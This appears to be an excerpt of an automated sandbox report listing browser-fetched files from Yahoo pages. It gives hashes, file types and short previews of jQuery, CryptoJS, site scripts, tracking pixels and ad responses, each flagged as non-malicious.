                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://playercdn.jivox.com/1700114009/unit/js/gz/jquery-2.1.0.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! jQuery v2.1.0 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k="".trim,l={},m=a.document,n="2.1.0",o=function(a,b){return new o.fn.init(a,b)},p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};o.fn=o.prototype={jquery:n,constructor:o,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=o.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return o.each(this,a,b)},map:function(a){return this.pushStack(o.map(this,function(b,c){return a.call(b,c,b)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.8739754318490536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M3ntzl7/lHh/:cplf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65786C291A4603AA5150A1884452838D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:612B96A8FE9F1C36E8349696A608780E6089AC77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DE3A7CA2F8AE592AAE2652335B755B0D0B65DF663DDA8776387CAE7339B76D64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F0DCF63AAB5264F143B8B012800D771615669D4B833ECCABF8A78449BC2571E8A331992C3A92936FAE8D5F3E1A5DCB940B7921B6A74318187107BAC93C863C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://c.evidon.com/a/4.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF87a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15264)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.53729719471769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:uQTCfjv99mW+911+Fl0YD0Dew/X2q5ulRIUeT:uQTCfGZ1+Fj9w/XuuT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E2202E6ED6EF52CEC2C4A875C99225BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD48D3157CFA6B6E6FEC3E50787E357AA3288C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F2CFBD195DFF011843F93E2D32979F6F07926211CBF3EDDDC3B708B0BB04C8A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4E2AEFD87D89F4D5C00CFCAC8EE2D7748F84979BE9E66272475A621A19BA8FC884737DF604B3B7344FE4EB0C1154819880BC3769E25798BB4ABDDEF76EDC9B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* @preserve. * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $. *. * Original:. * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt. */./* @preserve. * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp>. * Version: 1.0.1. * LastModified: Dec 25 1999. */./**. * @preserve This code contains an altered version of the original source and is not meant to misrepresent the original software.. */.function base64(r){if("undefined"!=typeof btoa)return btoa(r);for(var t,e,n,f,o,i,a,l="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",u=[],s=0;r.length>s;)t=r.charCodeAt(s++),e=r.charCodeAt(s++),n=r.charCodeAt(s++),f=t>>2,o=(3&t)<<4|e>>4,i=(15&e)<<2|n>>6,a=63&n,isNaN(e)?i=a=64:isNaN(n)&&(a=64),u.push(l.charAt(f)+l.charAt(o)+l.charAt(i)+l.charAt(a));return u.join("")}function lzw_encode(r){for(var t,e={},n=(r+"").split(""),f=[],o=n[0],i=256,a=n.length,l=1;a>l;l++)t=n[l],null!=e[o+t]?o+=t:(f.push(o.length>1?e[o]:o.charCodeAt(0)),e[o+t]=i,i++,o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.21215224812801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:9sTVLetlXFLPGQNd4+9oq0ySAwhtGaUW0/p0sCtO8Hc2Fw8JsrpN56ezCwmvF7wn:Yz3Wrpink+VkSZwBn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8BEFF48E5449634082D56B353052C6BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A024BD68997D9A53DE55377DBA2D3FD9287EB06D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ACDBDE57B77C93D119D3B7FCF8A19E6E930BE1B91B9CD2BD1DC23DBB52FBA4AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5C8D4D8C6782D2937D94D11BAB304A95E20C3054E49EBAC13EF27CEB7FA61A2033A1C280F41CC459825926EE2CE58FF82DDCC2B3065B5DAEEAED29239F4074DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Spinner.CydnjLPC.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Pt,e as zt,J as a,d as Nt,f as r,K as s,i as e,q as t,N as n,_ as vt,U as Et,k as St,l as i,n as wt}from"./scheduler.Dr9AAxFe.js";import{S as xt,i as qt}from"./index.DCSmZEjO.js";function Bt(X){let l,o,S,z,f,h,J,u,K,d,x,U,c,V,m,q,j,k,A,g,B,F,p,G,y,H,L,_,M,b,C,O,v,Q,E,D,R,w,T,P,Y;return{c(){l=zt("div"),o=a("svg"),S=a("g"),z=a("rect"),f=a("g"),h=a("g"),J=a("g"),u=a("path"),K=a("g"),d=a("path"),x=a("g"),U=a("g"),c=a("path"),V=a("g"),m=a("path"),q=a("g"),j=a("g"),k=a("path"),A=a("g"),g=a("path"),B=a("g"),F=a("g"),p=a("path"),G=a("g"),y=a("path"),H=a("g"),L=a("g"),_=a("path"),M=a("g"),b=a("path"),C=a("g"),O=a("g"),v=a("path"),Q=a("g"),E=a("path"),D=a("g"),R=a("g"),w=a("path"),T=a("g"),P=a("path"),this.h()},l(N){l=Nt(N,"DIV",{class:!0});var I=r(l);o=s(I,"svg",{width:!0,height:!0,"shape-rendering":!0,"text-rendering":!0,style:!0,viewBox:!0,xmlns:!0,role:!0,"aria-label":!0});var Z=r(o);S=s(Z,"g",{display:!0});var nt=r(S);z=s(nt,"rect",{width:!0,height:!0,fill:!0}),r(z).forEach(e),n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.html?gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (950)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.892901164198194
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:uq0S85Z0wRXavfUZbM7tKwVy4bO6K5NOxeJOQFy/dFZ5D7VY8f7VhKpZ0BpB:sS6SwRXavfUZQymO64OyO4y/jVbVQpSV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:62CBD5E972961F1694C1B1F98266AA26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D3CDCB2AFA958932BB2990817ACB14FB591D5A1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC8EDC7B2EFE585DA78ABC69C4AFD68CA64A06DEFE35E25F4B9591361709ECDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4605803E5148C920452A38C98ECBB34D66BB4CCD4358FD11F1AD6303114F4EA3076EAE5F8D49F4CFF15727853CFFF5A7E9B44FF3B5442492CA2F7F9210C17E82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Dialog.Ch6G-Ji-.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.dialog-overlay.yf-1vc3z4o{position:fixed;top:0;right:0;bottom:0;left:0;background-color:transparent}.dialog-container.yf-1vc3z4o{position:var(--dialog-position, fixed);inset:var(--dialog-top, 0) var(--dialog-right, 0) var(--dialog-bottom, 0) var(--dialog-left, 0);z-index:2;display:flex}.dialog-container[aria-hidden=true].yf-1vc3z4o{display:none;z-index:3}.dialog-overlay.overlay.yf-1vc3z4o{background-color:#000c}.dialog-content.yf-1vc3z4o{margin:auto;z-index:2;position:var(--dialog-content-position, relative);background-color:var(--surface3);border-radius:var(--border-radius-m);right:var(--dialog-content-right, auto);top:var(--dialog-content-top, auto)}.dialog-content.rounded.yf-1vc3z4o{border-radius:var(--border-radius-l)}.modal.yf-1vc3z4o{z-index:1000}.modal-2.yf-1vc3z4o{z-index:1000;margin:var(--space-4);outline:none}.closeBtn.yf-1vc3z4o{position:absolute;top:1rem;right:1rem;padding:0;border:0;margin:0;background:none;cursor:pointer}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):78000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.469895071794749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ZFfIMuTGmAwogHWRqBm+SUb0EZugaj8V/MbMfQvVt9a+rGFxZpoArxlPgOuk4kNN:ZdvoG3cBm+SVCNTV/MelrxlPhSFcLtwW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D184FB3A8ECF1D4F00D6546B98AB6390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CE8C51C43B15802E304ACB5752C4208CB2C0294B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A65DB5F56AB6CCBA3FB29C91A4B38AD0A5426CDC133328E40B7130120645C013
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5C64C36CECF756A0E499ED14254172075AE67F961D135551FC8363483ECABE7BA4E120F9E22B68B6DE921CE0528578691E871213BF55D90C944E0E5628C01912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e=this&&this.__assign||function(){return e=Object.assign||function(e){for(var t,s=1,o=arguments.length;s<o;s++)for(var n in t=arguments[s])Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n]);return e},e.apply(this,arguments)},t=1e3,s=60,o=60*s,n=24*o,i=7*n;var r={second:45,minute:45,hour:22,day:5};const l=1500,a=["https://query1.finance.yahoo.com","https://query2.finance.yahoo.com"],c={SEARCH:"/v1/finance/search",TRENDING:"/v1/finance/trending"},d="https://finance.yahoo.com",u="finSearchAutocomplete",h="nav",m="quotes",p="screenerFieldResults",g="lists",_="news",f="recommend",v="researchReports",b="finSearchContext",C="fin-search",y={ALL:"all",RESEARCH_REPORTS:"researchReports",QUOTE:"quote",HOLDERS:"instituationalHolders"},x={[m]:{title:"SYMBOLS"},[_]:{title:"NEWS"},[g]:{title:"LISTS"},[v]:{title:"RELATED_RESEARCH"},[f]:{title:"TRENDING"},[p]:{title:"HOLDERS"}},w={[y.ALL]:[h,m,_,g],[y.RESEARCH_REPORTS]:[h,m,_,v,g],[y.QUOTE]:[m],[y.HOLDERS]:[p]},L={[y.AL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.051097311226448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:HgHYEAyzXeaYXHan1sAwQ66oi8TiXH65A+zGxkhu:AHBABXHXAm7TaHyALChu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9545681AC011810B9AD9889D5DD213BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4F184D90CF3363AA661722540EA96E447F71F0FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:58B4DB1184561F6BDEB1EA56A9F94E526F6707F101D058A6CC4A8740DDF4960E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:75AF83C53946189B6E1FAC9B2228C4C7B3EDDD2DA413096D1DAE9255C09D4A654185CA43842E4822D206BBC666A3469B4F32E84ADE86CC73C80912BB75411898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/exchange/prebid?pbav=8.51.0&p=%5B%7B%22placement_id%22%3A%22sda-LREC-iframe%22%2C%22callback_id%22%3A%22866c117b0b790d%22%2C%22sizes%22%3A%5B%5B300%2C250%5D%2C%5B300%2C600%5D%5D%2C%22ym_placement_id%22%3A%223492444194302009637%22%2C%22gpid%22%3A%22us_yhp_main_dt_top_right%22%7D%2C%7B%22placement_id%22%3A%22sda-LREC3-iframe%22%2C%22callback_id%22%3A%22982fe208d180fc%22%2C%22sizes%22%3A%5B%5B300%2C250%5D%5D%2C%22ym_placement_id%22%3A%223492444194302009637%22%2C%22gpid%22%3A%22us_yhp_main_dt_as_mid_right_a%22%7D%2C%7B%22placement_id%22%3A%22sda-MAST-iframe%22%2C%22callback_id%22%3A%2210ffbe8e3703966%22%2C%22sizes%22%3A%5B%5B728%2C90%5D%2C%5B970%2C250%5D%5D%2C%22ym_placement_id%22%3A%223492444194302009637%22%2C%22gpid%22%3A%22us_yhp_main_dt_top_center%22%7D%2C%7B%22placement_id%22%3A%22sda-LREC4-iframe%22%2C%22callback_id%22%3A%22115354445c29a8f%22%2C%22sizes%22%3A%5B%5B300%2C250%5D%5D%2C%22ym_placement_id%22%3A%223492444194302009637%22%2C%22gpid%22%3A%22us_yhp_main_dt_as_mid_right_b%22%7D%2C%7B%22placement_id%22%3A%22sda-MON2-iframe%22%2C%22callback_id%22%3A%22121c4789615a2ad%22%2C%22sizes%22%3A%5B%5B300%2C600%5D%5D%2C%22ym_placement_id%22%3A%223492444194302009637%22%2C%22gpid%22%3A%22us_yhp_main_dt_as_mid_right_c%22%7D%5D&page_url=https%3A%2F%2Fwww.yahoo.com%2F&bust=1728414858957&dnt=false&description=Latest%20news%20coverage%2C%20email%2C%20free%20stock%20quotes%2C%20live%20scores%20and%20video%20are%20just%20the%20beginning.%20Discover%20more%20every%20day%20at%20Yahoo!&tmax=2000&userConsent=%7B%22gdprApplies%22%3A%22%22%2C%22cmp%22%3A%22%22%2C%22gpp%22%3A%22%22%2C%22gpp_sid%22%3A%5B%5D%7D&us_privacy=&pr=https%3A%2F%2Fortkn.lovationyme.com%2F&scrd=1&title=Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos&w=1280&h=907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:[{"callback_id":"866c117b0b790d","cpm":0.094786,"adomain":["ford.com"],"creative_id":"apxamh9h","creativeId":"apxamh9h","width":300,"height":600,"ad":"<html><head></head><body><script type=\"text/javascript\"> let parentWindowAmpContextData = ''; let parentWindowSafeframe = ''; let parentWindowAmp = ''; try { const parentWindow = window.parent; parentWindowAmpContextData = parentWindow.AMP_CONTEXT_DATA; parentWindowSafeframe = parentWindow.$sf; parentWindowAmp = parentWindow.context; } catch (e) { } const ampContextData = window.AMP_CONTEXT_DATA || parentWindowAmpContextData; const sf = window.$sf || parentWindowSafeframe; const regularAmpInfo = window.context || parentWindowAmp; if (!!ampContextData && !sf && !regularAmpInfo) { const scriptElement = document.createElement('script'); scriptElement.src = 'https://tpc.googlesyndication.com/safeframe/1-0-37/js/ext.js'; scriptElement.type = 'text/javascript'; scriptElement.async = 'async'; if (!parentWindowAmpContextData)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.94326352678362
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:q6O9tE52u7NEz3N8Oy2o2n4loOE7oSBYFOkXEy:BO9tq7NELN8Z2oJnBOk0y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9B77C2FEB657BB45557FADB6A6645BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:22C06B84DCA294DA42A857E6631803B91A7B9F33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F21521B1EA5EF693A463B7F86171979F8109315B1F883AF2F26CEFE811E19D67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FC864B7229A9EFBD7B8670CC239649502F1768A5489F4374019D1B4256B4B952364D328AB602E361CABC4C6DEAC91FFF034478A048AF0C55D94350700A8ADFBC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://images.taboola.com/taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1293%2Cx_74%2Cy_123/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/STABLE_DIFFUSION_OUTCROP/ESD/e9b25e04-39a2-48fa-b922-a01abe4d2761__Jsd4LRG6.jpg
